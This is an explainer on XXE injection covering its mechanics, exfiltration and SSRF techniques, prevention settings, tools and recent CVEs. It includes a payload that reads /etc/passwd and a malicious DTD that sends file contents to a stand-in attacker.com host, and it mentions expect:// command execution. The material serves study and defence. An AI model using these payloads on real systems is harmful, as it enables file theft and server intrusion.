Problem Framing
XML External Entity (XXE) injection remains a persistent and potent threat in modern application security. Despite its age and extensive documentation, the vulnerability continues to be widely discovered, often with critical implications. At its core, XXE exploits the XML parser's ability to process external entity declarations, allowing attackers to coerce the application into fetching and processing arbitrary content accessible via the server's context. This can range from trivial local file disclosure to complex server-side request forgery (SSRF), denial-of-service (DoS) conditions, and even remote code execution (RCE) [1][2][3].
The prevalence of XXE is directly tied to the pervasive use of XML in various application functionalities. From configuration files and data exchange formats (like SOAP) to document processing (e.g., Office Open XML formats like DOCX, XLSX) and image parsing (SVG), XML parsers are ubiquitous. Many of these parsers, especially older versions or those configured with insecure defaults, can be tricked into resolving external entities pointing to sensitive local files, internal network resources, or even attacker-controlled endpoints [4][5][6][3][7].
The challenge for practitioners lies not only in understanding the fundamental mechanics of XXE but also in recognizing its diverse attack vectors and the sophisticated techniques employed by attackers to bypass defenses. The landscape of XXE exploitation has evolved significantly, moving beyond simple in-band retrieval to more advanced blind and out-of-band (OOB) techniques designed to exfiltrate data when direct responses are not available [8][9][10][11].
Core Mechanics
XXE vulnerabilities stem from the way XML parsers handle external entities. An XML document can define a Document Type Definition (DTD), which can, in turn, define entities. These entities act as shortcuts or variables that can represent strings, XML markup, or, crucially for XXE, external resources referenced by a URI [12][13][3].
A basic XXE payload leverages the SYSTEM keyword within an entity declaration to reference a URI. This URI can point to a local file using the file:// scheme or a remote resource via http://, ftp://, or other protocols [1][13]. When the XML parser encounters such an entity reference in the processed XML, it attempts to dereference the URI, fetch the content, and substitute it for the entity. If this process is not properly secured, the retrieved content can be exposed to the attacker.
A canonical example illustrates this:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <foo>&xxe;</foo>
In this payload, the &xxe; entity is defined to fetch the content of /etc/passwd. When the application's XML parser processes this, it will attempt to read the file and, if the result is reflected in the response, the attacker gains access to the password hash file [13][7].
This fundamental mechanism can be extended and manipulated in numerous ways, forming the basis for more complex attacks. The key to exploitation lies in identifying an input vector that accepts XML and a parser that is configured to resolve external entities.
Notable Techniques
The evolution of XXE exploitation has led to a sophisticated array of techniques used to bypass security controls and achieve various objectives.
File Disclosure
The most straightforward application of XXE is reading local files. Attackers commonly target sensitive system files such as /etc/passwd and /etc/shadow on Unix-like systems, or C:\Windows\win.ini and registry keys on Windows [1][13][3].
Beyond system files, attackers can target application configuration files (e.g., database credentials, API keys), source code, or even cloud metadata endpoints (e.g., AWS EC2 instance metadata services) [1][14][15][3].
Server-Side Request Forgery (SSRF)
XXE can be leveraged to force the vulnerable server to make arbitrary HTTP requests to internal or external resources. This is invaluable for internal network reconnaissance, port scanning, and interacting with internal services that are not directly exposed to the internet [16][1][2][3][7]. For example, an attacker could try to access http://internal-service:8080/admin to check if an internal administrative interface is reachable [7].
Blind XXE and Out-of-Band (OOB) Exfiltration
In scenarios where the application does not directly reflect the results of entity expansion in its response (blind XXE), attackers must employ out-of-band techniques to exfiltrate data. This involves forcing the vulnerable server to make an external network request to a server controlled by the attacker [8][9][10][11].
A common method is to host a malicious DTD file on an attacker-controlled server. This DTD can contain logic to read a local file and then embed its content into a URL that the vulnerable server will request. This can be achieved using parameter entities and string concatenation.
A typical malicious DTD might look like this:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>"> %eval; %exfiltrate;
When referenced in an XXE payload, the vulnerable server fetches this DTD, reads /etc/passwd, and then sends its content as a query parameter to http://attacker.com/ [9][10][11].
Protocol Exploitation
Beyond HTTP, XXE can exploit other protocols if supported by the XML parser and the underlying Java runtime or application environment. These include:
- FTP: Useful for exfiltrating data, especially when newlines or special characters in the file content might break HTTP URLs [17][18][19].
- Gopher: Historically used for more direct TCP interaction, though largely deprecated in modern Java versions [18][20].
jar://: Allows reading files from JAR archives, which can be leveraged in Java environments [18][20][21].ldap://: Can be used to interact with LDAP servers.mailto://: Can trigger email sending.
PHP Wrapper Exploitation (RCE)
In PHP environments where specific extensions are enabled, XXE can be escalated to Remote Code Execution (RCE). The expect:// wrapper, for instance, allows arbitrary command execution. By crafting an entity like SYSTEM "expect://id", an attacker can execute system commands on the server [14][22][13][23]. This can further be used to download and execute a web shell for persistent access [14][22].
File Upload Vectors
XXE vulnerabilities are not limited to direct XML input. File upload functionalities that process XML-based formats present significant attack surfaces.
- Office Documents (DOCX, XLSX): These formats are ZIP archives containing XML files. By modifying internal XML (e.g.,
xl/workbook.xmlin XLSX), XXE payloads can be injected [4][24][25][26][21]. - SVG: Scalable Vector Graphics are XML-based and can contain XXE payloads within their markup, allowing for file disclosure when parsed [1][24][27].
- PDFs with XFA: Adobe's XML Forms Architecture (XFA) embedded in PDFs can be a vector for XXE [5][28].
XML Parameter Entities vs. General Entities
When standard entities are blocked, XML parameter entities (declared with % and referenced with %) can sometimes bypass restrictions, particularly within DTDs. This is crucial for complex OOB exfiltration and blind XXE techniques [8][9][6][10][11].
Local DTD Exploitation
When external DTDs are blocked, but local DTD files exist on the server, attackers can sometimes repurpose these local DTDs to achieve XXE. This involves injecting content into local DTDs that redefine existing entities, leading to file disclosure or SSRF [29][20][11].
Detection & Prevention
The primary defense against XXE is to disable the processing of external entities entirely. This is typically achieved by configuring the XML parser securely.
Disabling External Entity Processing
- Disable DTDs: The most effective method is to disallow Document Type Definitions (DTDs) altogether. Most parsers provide a feature to disable DOCTYPE declarations [23].
- Java's
DocumentBuilderFactory:dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);[23][30]. - Other languages and parsers have similar mechanisms [23].
- Disable External General and Parameter Entities: If disabling DTDs is not feasible, explicitly disable external general and parameter entities [23].
- Java's
DocumentBuilderFactory:dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);anddbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);[23]. - Enable Secure Processing Features: Some parsers offer a secure processing mode, though its effectiveness can be implementation-dependent [23].
Input Validation and Sanitization
While not a primary defense, validating and sanitizing XML input can act as a secondary layer. However, reliance solely on sanitization is discouraged, as XML's complexity makes it difficult to create foolproof filters [13][27].
Web Application Firewalls (WAFs)
WAFs can be configured with rules to detect and block common XXE patterns, such as DOCTYPE, SYSTEM, and ENTITY keywords within XML payloads [4][31][13][27]. However, attackers can often bypass WAFs through encoding, character variations, or by using less common protocols or DTD structures [29].
Dependency Management
Ensure that all XML parsing libraries and frameworks are kept up-to-date to benefit from security patches and default secure configurations [5][3][25].
Limiting Permissions
The principle of least privilege should be applied to the application process running the XML parser. This limits the impact of a successful XXE attack by restricting access to sensitive files and network resources [32].
Tooling
Several tools assist in the discovery and exploitation of XXE vulnerabilities:
- Burp Suite: Intercepting proxy for manual testing, repeater for payload manipulation, and Collaborator for OOB detection [12][13][27][11][33].
- Nuclei: An automated scanner with templates for detecting XXE vulnerabilities [34][27].
- XXEinjector: Automates file reading, directory listing, and OOB exploitation via various protocols (FTP, HTTP, Gopher) [35].
- Docem: Embeds XXE and XSS payloads into various Office Open XML (OOXML) document formats (DOCX, XLSX, etc.) [26][36][21].
- Oxml_xxe: Another tool for embedding XXE payloads into OXML documents [21].
- XXExploiter: Generates XML payloads and starts servers for OOB DTDs or data exfiltration [37].
- DTD Finder: Tool to locate DTD files with injectable entities within archive files [29].
Recent Developments
Recent discoveries highlight the continued relevance and evolving attack vectors of XXE:
- Apache Tika CVE-2025-66516: A critical XXE vulnerability in Apache Tika, a content analysis toolkit, allowing for RCE, SSRF, and information disclosure via crafted PDF files with malicious XFA content. Notably, an initial patch missed addressing the root cause in all modules, leaving many deployments vulnerable [5][28].
- GeoNetwork CVE-2026-58400: Unauthenticated RCE was achieved by chaining an insecure Saxon XSLT processor configuration with an unauthenticated file upload vulnerability [38].
- GeoServer CVE-2025-30220: XXE vulnerability in the Web Feature Service (WFS) that bypasses entity resolution controls, enabling OOB data exfiltration and SSRF [16][39].
- ArubaOS CVE-2025-58360: Pre-authentication XXE with confirmed OOB SSRF, which was controversially closed as "theoretical/no valid PoC" despite substantial evidence [40][41].
- Akamai CloudTest CVE-2025-49493: XXE found in SOAP endpoints, exploitable via error-based techniques and external DTDs, leading to file disclosure [42][43].
- Jinher OA CVE-2025-11035: XXE vulnerability in
ManageWord.aspxallowing data exfiltration and SSRF [31]. - Adobe Experience Manager Forms CVE-2025-54254: XXE leading to arbitrary file system read, exploitable without authentication or user interaction [32].
- Langchain-community CVE-2025-6984: XXE vulnerability due to insecure use of
etree.iterparse()[44]. - Office Document XXE: Continued discovery of XXE in applications processing DOCX, XLSX, and other OOXML formats, often due to manual parser implementations or outdated dependencies [4][24][25][26][21].
These examples underscore that XXE remains a significant threat, particularly in applications that process user-supplied XML or XML-based file formats, and where XML parsers are not configured with secure defaults.
Where to Go Deeper
For a comprehensive understanding and advanced exploitation techniques, the following resources are highly recommended:
- OWASP XXE Prevention Cheat Sheet: The authoritative guide on mitigating XXE vulnerabilities across various programming languages and parsers [23].
- PortSwigger Web Security Academy - XXE: Provides in-depth explanations and practical labs for mastering XXE exploitation, including blind and OOB techniques [7][45][46][11].
- "XML External Entity (XXE) Attacks: A Compendium of Known Techniques" by Timothy Morgan: A foundational research paper detailing various XXE attack vectors [13][23].
- Research articles and blog posts: Numerous practitioners share detailed write-ups of XXE discoveries, offering practical insights into exploitation techniques and real-world findings. Notable authors and resources include those cited throughout this document such as Zsec.uk [17][19], Instatunnel.my [1][10], Honoki.net [20], and hackviser.com [27].
- GitHub repositories for XXE tools: Exploring tools like Docem [26][21], XXEinjector [35], and XXExploiter [37] can provide hands-on experience and automation capabilities.
- Bug bounty write-ups: Platforms like Medium and HackerOne host numerous detailed write-ups of XXE vulnerabilities discovered in bug bounty programs, offering practical examples and case studies [38][47][4][48][40][41][5][16][30][49][50][51][1][44][28][39][52][24][53][8][34][54][55][12][56][57][45][58][14][59][9][46][60][6][2][42][31][32][61][62][22][63][64][13][10][43][3][27][11][15][17][65][66][67][68][35][69][18][25][70][71][33][72][73][74][75][29][23][7][20][76][77][26][78][37][79][36][80][81][82][19][83][21].